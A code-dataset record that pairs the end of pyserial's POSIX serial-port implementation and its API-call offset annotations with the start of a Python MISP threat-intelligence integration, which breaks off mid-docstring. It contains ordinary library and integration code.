cflag |= (TERMIOS.CSTOPB)
else:
raise ValueError('Invalid stop bit specification: %r' % self._stopbits)
# setup parity
iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP)
if self._parity == PARITY_NONE:
cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD)
elif self._parity == PARITY_EVEN:
cflag &= ~(TERMIOS.PARODD)
cflag |= (TERMIOS.PARENB)
elif self._parity == PARITY_ODD:
cflag |= (TERMIOS.PARENB|TERMIOS.PARODD)
else:
raise ValueError('Invalid parity: %r' % self._parity)
# setup flow control
# xonxoff
if hasattr(TERMIOS, 'IXANY'):
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY)
else:
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF)
# rtscts
if hasattr(TERMIOS, 'CRTSCTS'):
if self._rtscts:
cflag |= (TERMIOS.CRTSCTS)
else:
cflag &= ~(TERMIOS.CRTSCTS)
elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name
if self._rtscts:
cflag |= (TERMIOS.CNEW_RTSCTS)
else:
cflag &= ~(TERMIOS.CNEW_RTSCTS)
# XXX should there be a warning if setting up rtscts (and xonxoff etc) fails??
# buffer
        # vmin "minimal number of characters to be read. 0 for non blocking"
if vmin < 0 or vmin > 255:
raise ValueError('Invalid vmin: %r ' % vmin)
cc[TERMIOS.VMIN] = vmin
# vtime
if vtime < 0 or vtime > 255:
raise ValueError('Invalid vtime: %r' % vtime)
cc[TERMIOS.VTIME] = vtime
# activate settings
termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
# apply custom baud rate, if any
if custom_baud is not None:
set_special_baudrate(self, custom_baud)
def close(self):
"""Close port"""
if self._isOpen:
if self.fd is not None:
os.close(self.fd)
self.fd = None
self._isOpen = False
def makeDeviceName(self, port):
return device(port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
#~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str)
s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str)
return struct.unpack('I',s)[0]
# select based implementation, proved to work on many systems
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
           return fewer characters than requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
while len(read) < size:
ready,_,_ = select.select([self.fd],[],[], self._timeout)
# If select was used with a timeout, and the timeout occurs, it
# returns with empty lists -> thus abort read operation.
# For timeout == 0 (non-blocking operation) also abort when there
# is nothing to read.
if not ready:
break # timeout
buf = os.read(self.fd, size-len(read))
# read should always return some data as select reported it was
# ready to read when we get to this point.
if not buf:
# Disconnected devices, at least on Linux, show the
# behavior that they are always ready to read immediately
# but reading returns nothing.
raise SerialException('device reports readiness to read but returned no data (device disconnected?)')
read.extend(buf)
return bytes(read)
def write(self, data):
"""Output the given string over the serial port."""
if self.fd is None: raise portNotOpenError
t = len(data)
d = data
if self._writeTimeout is not None and self._writeTimeout > 0:
timeout = time.time() + self._writeTimeout
else:
timeout = None
while t > 0:
try:
n = os.write(self.fd, d)
if timeout:
# when timeout is set, use select to wait for being ready
# with the time left as timeout
timeleft = timeout - time.time()
if timeleft < 0:
raise writeTimeoutError
_, ready, _ = select.select([], [self.fd], [], timeleft)
if not ready:
raise writeTimeoutError
d = d[n:]
t = t - n
except OSError as v:
if v.errno != errno.EAGAIN:
raise SerialException('write failed: %s' % (v,))
return len(data)
def flush(self):
"""Flush of file like objects. In this case, wait until all data
is written."""
self.drainOutput()
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCIFLUSH)
def flushOutput(self):
"""Clear output buffer, aborting the current output and
discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCOFLUSH)
def sendBreak(self, duration=0.25):
"""Send break condition. Timed, returns to idle state after given duration."""
if self.fd is None:
raise portNotOpenError
termios.tcsendbreak(self.fd, int(duration/0.25))
def setBreak(self, level=1):
"""Set break: Controls TXD. When active, no transmitting is possible."""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCSBRK)
else:
fcntl.ioctl(self.fd, TIOCCBRK)
def setRTS(self, level=1):
"""Set terminal status line: Request To Send"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str)
def setDTR(self, level=1):
"""Set terminal status line: Data Terminal Ready"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str)
def getCTS(self):
"""Read terminal status line: Clear To Send"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CTS != 0
def getDSR(self):
"""Read terminal status line: Data Set Ready"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_DSR != 0
def getRI(self):
"""Read terminal status line: Ring Indicator"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_RI != 0
def getCD(self):
"""Read terminal status line: Carrier Detect"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CD != 0
# - - platform specific - - - -
def drainOutput(self):
"""internal - not portable!"""
if self.fd is None: raise portNotOpenError
termios.tcdrain(self.fd)
def nonblocking(self):
"""internal - not portable!"""
if self.fd is None:
raise portNotOpenError
fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)
def fileno(self):
"""For easier use of the serial port instance with select.
WARNING: this function is not portable to different platforms!"""
if self.fd is None: raise portNotOpenError
return self.fd
def flowControl(self, enable):
"""manually control flow - when hardware or software flow control is
enabled"""
if enable:
termios.tcflow(self.fd, TERMIOS.TCION)
else:
termios.tcflow(self.fd, TERMIOS.TCIOFF)
# assemble Serial class with the platform specific implementation and the base
# for file-like behavior. for Python 2.6 and newer, which provide the new I/O
# library, derive from io.RawIOBase
try:
import io
except ImportError:
# classic version with our own file-like emulation
class Serial(PosixSerial, FileLike):
pass
else:
# io library present
class Serial(PosixSerial, io.RawIOBase):
pass
class PosixPollSerial(Serial):
"""poll based read implementation. not all systems support poll properly.
however this one has better handling of errors, such as a device
disconnecting while it's in use (e.g. USB-serial unplugged)"""
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
           return fewer characters than requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
poll = select.poll()
poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL)
if size > 0:
while len(read) < size:
# print "\tread(): size",size, "have", len(read) #debug
# wait until device becomes ready to read (or something fails)
for fd, event in poll.poll(self._timeout*1000):
if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL):
raise SerialException('device reports error (poll)')
# we don't care if it is select.POLLIN or timeout, that's
# handled below
buf = os.read(self.fd, size - len(read))
read.extend(buf)
if ((self._timeout is not None and self._timeout >= 0) or
(self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf:
break # early abort on timeout
return bytes(read)
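# Illustrative usage sketch (not part of the original module), assuming a typical
# POSIX device path; PosixPollSerial is constructed and used exactly like Serial,
# it only swaps the select() based read loop for a poll() based one:
#   port = PosixPollSerial('/dev/ttyUSB0', baudrate=115200, timeout=1)
#   data = port.read(64)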
if __name__ == '__main__':
s = Serial(0,
baudrate=19200, # baud rate
bytesize=EIGHTBITS, # number of data bits
parity=PARITY_EVEN, # enable parity checking
stopbits=STOPBITS_ONE, # number of stop bits
timeout=3, # set a timeout value, None for waiting forever
xonxoff=0, # enable software flow control
rtscts=0, # enable RTS/CTS flow control
)
s.setRTS(1)
s.setDTR(1)
s.flushInput()
s.flushOutput()
    s.write(b'hello')
sys.stdout.write('%r\n' % s.read(5))
sys.stdout.write('%s\n' % s.inWaiting())
del s
| [
"os.open",
"fcntl.fcntl",
"termios.tcflush",
"select.poll",
"termios.tcflow",
"termios.tcdrain",
"termios.tcsetattr",
"FCNTL.ioctl",
"os.uname",
"select.select",
"array.array",
"os.close",
"os.write",
"struct.pack",
"sys.stderr.write",
"struct.unpack",
"time.time",
"sys.platform.lower",
"fcntl.ioctl",
"termios.tcgetattr"
] | [((909, 929), 'sys.platform.lower', 'sys.platform.lower', ([], {}), '()\n', (927, 929), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8255, 8274), 'struct.pack', 'struct.pack', (['"""I"""', '(0)'], {}), "('I', 0)\n", (8266, 8274), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8291, 8318), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_RTS'], {}), "('I', TIOCM_RTS)\n", (8302, 8318), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8335, 8362), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_DTR'], {}), "('I', TIOCM_DTR)\n", (8346, 8362), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1178, 1204), 'array.array', 'array.array', (['"""i"""', '([0] * 32)'], {}), "('i', [0] * 32)\n", (1189, 1204), False, 'import array, fcntl\n'), ((1242, 1288), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCGSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)\n', (1253, 1288), False, 'import FCNTL\n'), ((14576, 14673), 'termios.tcsetattr', 'termios.tcsetattr', (['self.fd', 'TERMIOS.TCSANOW', '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'], {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag,\n ispeed, ospeed, cc])\n', (14593, 14673), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15335, 15380), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCINQ', 'TIOCM_zero_str'], {}), '(self.fd, TIOCINQ, TIOCM_zero_str)\n', (15346, 15380), False, 'import array, fcntl\n'), ((18213, 18255), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCIFLUSH'], {}), '(self.fd, TERMIOS.TCIFLUSH)\n', (18228, 18255), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18468, 18510), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCOFLUSH'], {}), '(self.fd, TERMIOS.TCOFLUSH)\n', (18483, 18510), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19762, 19808), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (19773, 19808), False, 'import array, fcntl\n'), ((20007, 20053), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20018, 20053), False, 'import array, fcntl\n'), ((20251, 20297), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20262, 20297), False, 'import array, fcntl\n'), ((20494, 20540), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20505, 20540), False, 'import array, fcntl\n'), ((20759, 20783), 'termios.tcdrain', 'termios.tcdrain', (['self.fd'], {}), '(self.fd)\n', (20774, 20783), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20922, 20972), 'fcntl.fcntl', 'fcntl.fcntl', (['self.fd', 'FCNTL.F_SETFL', 'os.O_NONBLOCK'], {}), '(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\n', (20933, 20972), False, 'import array, fcntl\n'), ((22494, 22507), 'select.poll', 'select.poll', ([], {}), '()\n', (22505, 22507), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1505, 1551), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCSSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)\n', (1516, 1551), False, 'import FCNTL\n'), ((9036, 9098), 'os.open', 'os.open', (['self.portstr', '(os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)'], {}), '(self.portstr, os.O_RDWR | 
os.O_NOCTTY | os.O_NONBLOCK)\n', (9043, 9098), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((10218, 10244), 'termios.tcgetattr', 'termios.tcgetattr', (['self.fd'], {}), '(self.fd)\n', (10235, 10244), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15396, 15417), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (15409, 15417), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15862, 15909), 'select.select', 'select.select', (['[self.fd]', '[]', '[]', 'self._timeout'], {}), '([self.fd], [], [], self._timeout)\n', (15875, 15909), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18955, 18985), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCSBRK'], {}), '(self.fd, TIOCSBRK)\n', (18966, 18985), False, 'import array, fcntl\n'), ((19012, 19042), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCCBRK'], {}), '(self.fd, TIOCCBRK)\n', (19023, 19042), False, 'import array, fcntl\n'), ((19212, 19257), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)\n', (19223, 19257), False, 'import array, fcntl\n'), ((19284, 19329), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)\n', (19295, 19329), False, 'import array, fcntl\n'), ((19503, 19548), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)\n', (19514, 19548), False, 'import array, fcntl\n'), ((19575, 19620), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)\n', (19586, 19620), False, 'import array, fcntl\n'), ((21377, 21415), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCION'], {}), '(self.fd, TERMIOS.TCION)\n', (21391, 21415), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((21442, 21481), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCIOFF'], {}), '(self.fd, TERMIOS.TCIOFF)\n', (21456, 21481), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((14924, 14941), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (14932, 14941), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17064, 17075), 'time.time', 'time.time', ([], {}), '()\n', (17073, 17075), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17196, 17216), 'os.write', 'os.write', (['self.fd', 'd'], {}), '(self.fd, d)\n', (17204, 17216), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((9404, 9421), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (9412, 9421), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17547, 17589), 'select.select', 'select.select', (['[]', '[self.fd]', '[]', 'timeleft'], {}), '([], [self.fd], [], timeleft)\n', (17560, 17589), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19824, 19845), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (19837, 19845), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20069, 20090), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20082, 20090), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20313, 20334), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20326, 20334), False, 'import sys, os, fcntl, termios, struct, select, 
errno, time\n'), ((20556, 20577), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20569, 20577), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17416, 17427), 'time.time', 'time.time', ([], {}), '()\n', (17425, 17427), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((3798, 3826), 'array.array', 'array.array', (['"""i"""', '[baudrate]'], {}), "('i', [baudrate])\n", (3809, 3826), False, 'import array, fcntl\n'), ((3899, 3940), 'fcntl.ioctl', 'fcntl.ioctl', (['port.fd', 'IOSSIOSPEED', 'buf', '(1)'], {}), '(port.fd, IOSSIOSPEED, buf, 1)\n', (3910, 3940), False, 'import array, fcntl\n'), ((3527, 3537), 'os.uname', 'os.uname', ([], {}), '()\n', (3535, 3537), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((5714, 6179), 'sys.stderr.write', 'sys.stderr.write', (['("""don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))'], {}), '(\n """don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))\n', (5730, 6179), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n')] |
# type: ignore
from typing import Union, List, Dict
from urllib.parse import urlparse
import urllib3
from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute
from pymisp.tools import GenericObjectGenerator
import copy
from pymisp.tools import FileObject
from CommonServerPython import *
logging.getLogger("pymisp").setLevel(logging.CRITICAL)
def handle_connection_errors(error):
if "SSLError" in error:
return_error('Unable to connect to MISP because of a SSLCertVerificationError, '
'Please try to use the Trust any certificate option.')
if "NewConnectionError" in error:
return_error('Unable to connect to MISP because of a NewConnectionError, '
'Please make sure your MISP server url is correct.')
if "Please make sure the API key and the URL are correct" in error:
return_error('Unable to connect to MISP, '
'Please make sure the API key is correct.')
return_error(error)
def warn(*args):
"""
Do nothing with warnings
"""
pass
# Disable requests warnings
urllib3.disable_warnings()
# Disable python warnings
warnings.warn = warn
''' GLOBALS/PARAMS '''
params = demisto.params()
if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')):
raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.')
MISP_URL = params.get('url')
VERIFY = not params.get('insecure')
PROXIES = handle_proxy() # type: ignore
try:
PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)
except PyMISPError as e:
handle_connection_errors(e.message)
PREDEFINED_FEEDS = {
'CIRCL': {'name': 'CIRCL OSINT Feed',
'url': 'https://www.circl.lu/doc/misp/feed-osint',
'format': 'misp',
'input': 'network'},
'Botvrij.eu': {'name': 'The Botvrij.eu Data',
'url': 'http://www.botvrij.eu/data/feed-osint',
'format': 'misp',
'input': 'network'}
}
THREAT_LEVELS_TO_ID = {
'High': 1,
'Medium': 2,
'Low': 3,
'Unknown': 4
}
MISP_ENTITIES_TO_CONTEXT_DATA = {
'deleted': 'Deleted',
'category': 'Category',
'comment': 'Comment',
'uuid': 'UUID',
'sharing_group_id': 'SharingGroupID',
'timestamp': 'LastChanged',
'to_ids': 'ToIDs',
'value': 'Value',
'event_id': 'EventID',
'ShadowAttribute': 'ShadowAttribute',
'disable_correlation': 'DisableCorrelation',
'distribution': 'Distribution',
'type': 'Type',
'id': 'ID',
'date': 'CreationDate',
'info': 'Info',
'published': 'Published',
'attribute_count': 'AttributeCount',
'proposal_email_lock': 'ProposalEmailLock',
'locked': 'Locked',
'publish_timestamp': 'PublishTimestamp',
'event_creator_email': 'EventCreatorEmail',
'name': 'Name',
'analysis': 'Analysis',
'threat_level_id': 'ThreatLevelID',
'old_id': 'OldID',
'org_id': 'OrganizationID',
'Org': 'Organization',
'Orgc': 'OwnerOrganization',
'orgc_uuid': 'OwnerOrganization.UUID',
'orgc_id': 'OwnerOrganization.ID',
'orgc_name': 'OwnerOrganization.Name',
'event_uuid': 'EventUUID',
'proposal_to_delete': 'ProposalToDelete',
'description': 'Description',
'version': 'Version',
'Object': 'Object',
'object_id': 'ObjectID',
'object_relation': 'ObjectRelation',
'template_version': 'TemplateVersion',
'template_uuid': 'TemplateUUID',
'meta-category': 'MetaCategory',
'decay_score': 'DecayScore',
'first_seen': 'first_seen',
'last_seen': 'last_seen',
'provider': 'Provider',
'source_format': 'SourceFormat',
'url': 'URL',
'event_uuids': 'EventUUIDS',
}
MISP_ANALYSIS_TO_IDS = {
'initial': 0,
'ongoing': 1,
'completed': 2
}
MISP_DISTRIBUTION_TO_IDS = {
'Your_organization_only': 0,
'This_community_only': 1,
'Connected_communities': 2,
'All_communities': 3,
'Inherit_event': 5
}
SIGHTING_TYPE_NAME_TO_ID = {
'sighting': 0,
'false_positive': 1,
'expiration': 2
}
SIGHTING_TYPE_ID_TO_NAME = {
'0': 'sighting',
'1': 'false_positive',
'2': 'expiration'
}
INDICATOR_TYPE_TO_DBOT_SCORE = {
'FILE': DBotScoreType.FILE,
'URL': DBotScoreType.URL,
'DOMAIN': DBotScoreType.DOMAIN,
'IP': DBotScoreType.IP,
'EMAIL': DBotScoreType.EMAIL,
}
DOMAIN_REGEX = (
r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}"
"[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*"
"\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css"
"|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$"
"|localhost)"
)
MISP_SEARCH_ARGUMENTS = [
'value',
'type',
'category',
'org',
'tags',
'from',
'to',
'event_id',
'uuid',
'to_ids',
'last',
'include_decay_score',
'include_sightings',
'include_correlations',
'limit',
'page',
'enforceWarninglist',
'include_feed_correlations',
]
EVENT_FIELDS = [
'id',
'orgc_id',
'org_id',
'date',
'threat_level_id',
'info',
'published',
'uuid',
'analysis',
'attribute_count',
'timestamp',
'distribution',
'proposal_email_lock',
'locked',
'publish_timestamp',
'sharing_group_id',
'disable_correlation',
'event_creator_email',
'Org',
'Orgc',
'RelatedEvent',
'Galaxy',
'Tag',
'decay_score',
'Object',
'Feed',
]
ATTRIBUTE_FIELDS = [
'id',
'event_id',
'object_id',
'object_relation',
'category',
'type',
'to_ids',
'uuid',
'timestamp',
'distribution',
'sharing_group_id',
'comment',
'deleted',
'disable_correlation',
'first_seen',
'last_seen',
'value',
'Event',
'Object',
'Galaxy',
'Tag',
'decay_score',
'Sighting',
]
def extract_error(error: list) -> List[dict]:
"""
Extracting errors raised by PYMISP into readable response, for more information and examples
please see UT: test_extract_error.
Args:
error: list of responses from error section
Returns:
List[Dict[str, any]]: filtered response
"""
return [{
'code': err[0],
'message': err[1].get('message'),
'errors': err[1].get('errors')
} for err in error]
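# Illustrative example (not from the original source) of the shape extract_error
# produces: a PyMISP error section such as
#   [(403, {'message': 'Could not add object', 'errors': 'Invalid event'})]
# is converted to
#   [{'code': 403, 'message': 'Could not add object', 'errors': 'Invalid event'}]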
def dict_to_generic_object_format(args: dict) -> List[dict]:
"""
Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp.
Args:
args: dictionary describes MISP object
Returns:
list: list containing dicts that GenericObjectGenerator can take.
Examples:
>>> {'ip': '8.8.8.8', 'domain': 'google.com'}
[{'ip': '8.8.8.8'}, {'domain': 'google.com'}]
"""
return [{k: v} for k, v in args.items()]
def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator:
"""
Args:
template_name: template name as described in https://github.com/MISP/misp-objects
args: arguments to create the generic object
Returns:
GenericObjectGenerator: object created in MISP
Example:
args should look like:
[{'analysis_submitted_at': '2018-06-15T06:40:27'},
{'threat_score': {value=95, to_ids=False}},
{'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'},
{'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96},
{'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line
"""
misp_object = GenericObjectGenerator(template_name)
misp_object.generate_attributes(args)
return misp_object
def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str:
"""
Gets a timestamp from MISP response (1546713469) and converts it to human readable format
"""
return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else ""
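# Illustrative example (not from the original source): the docstring's sample
# timestamp 1546713469 would be rendered as '2019-01-05T18:37:49Z', while a
# missing/empty timestamp yields ''.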
def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]:
"""
    Replacing keys from MISP's format to Demisto's (as they appear in MISP_ENTITIES_TO_CONTEXT_DATA)
Args:
obj_to_build (Union[dict, list, str]): object to replace keys in
Returns:
Union[dict, list, str]: same object type that got in
"""
if isinstance(obj_to_build, list):
return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build]
if isinstance(obj_to_build, dict):
return {
(MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key):
replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items()
}
return obj_to_build
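# Illustrative example (not from the original source): keys are renamed recursively,
# so {'event_id': '123', 'Tag': [{'uuid': 'abc'}]} becomes
# {'EventID': '123', 'Tag': [{'UUID': 'abc'}]}, while keys that are not listed in
# MISP_ENTITIES_TO_CONTEXT_DATA are left untouched.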
def reputation_command_to_human_readable(outputs, score, events_to_human_readable):
found_tag_id, found_tag_name = "", ""
for event in events_to_human_readable:
# removing those fields as they are shared by the events
found_tag_id = event.pop('Tag_ID')
found_tag_name = event.pop('Tag_Name')
return {
'Attribute Type': outputs[0].get('Type'),
'Dbot Score': score,
'Attribute Value': outputs[0].get('Value'),
'Attribute Category': outputs[0].get('Category'),
'Timestamp': outputs[0].get('Timestamp'),
'Events with the scored tag': events_to_human_readable,
'Scored Tag ID': found_tag_id,
'Scored Tag Name': found_tag_name,
}
def limit_tag_output_to_id_and_name(attribute_dict, is_event_level):
"""
    As the tag list can be full of unnecessary data, we want to limit this list to include only the ID and Name fields.
    In addition, returns a set of the found tag ids.
    Some tags have a field called inherited. When it is set to 1 it indicates that this is an event's tag.
    Otherwise (if it is set to 0 or does not exist) it indicates that this is an attribute's tag.
If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags
(event ones and the event's attribute tags ones as it is part of the event scope).
If the data is attribute's (is_event_level = false), and the tag is only related to an attribute
we would like to add it to tag_set_ids. In any other case, we won't add the tag.
Args:
attribute_dict (dict): The dictionary that includes the tag list.
is_event_level (bool): Whether the attribute_dict was received from an event object,
meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags).
"""
output = []
tag_set_ids = set()
tags_list = attribute_dict.get('Tag', [])
for tag in tags_list:
is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0'
tag_id = tag.get('id')
if is_event_level:
tag_set_ids.add(tag_id)
else: # attribute level
if not is_event_tag:
tag_set_ids.add(tag_id)
output.append({'ID': tag_id, 'Name': tag.get('name')})
return output, tag_set_ids
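# Illustrative example (not from the original source): for an attribute-level call
# (is_event_level=False) with
#   {'Tag': [{'id': '7', 'name': 'tlp:red'}, {'id': '9', 'name': 'exported', 'inherited': 1}]}
# the function returns
#   ([{'ID': '7', 'Name': 'tlp:red'}, {'ID': '9', 'Name': 'exported'}], {'7'})
# i.e. both tags are kept in the output list, but only the non-inherited tag id is
# collected into the returned set.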
def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
After getting all the attributes which match the required indicator value, this function parses the response.
    This function goes over all the attributes that were found (after limiting the attributes amount to the given limit)
    and, via sub-functions, calculates the score of the indicator.
    For the context data outputs, for every attribute we remove the "Related Attribute" list and limit the tags and
    galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects.
    Note: When limiting the attributes amount, we sort the attributes list by the event ids, as higher event ids are
    the newer ones.
Returns:
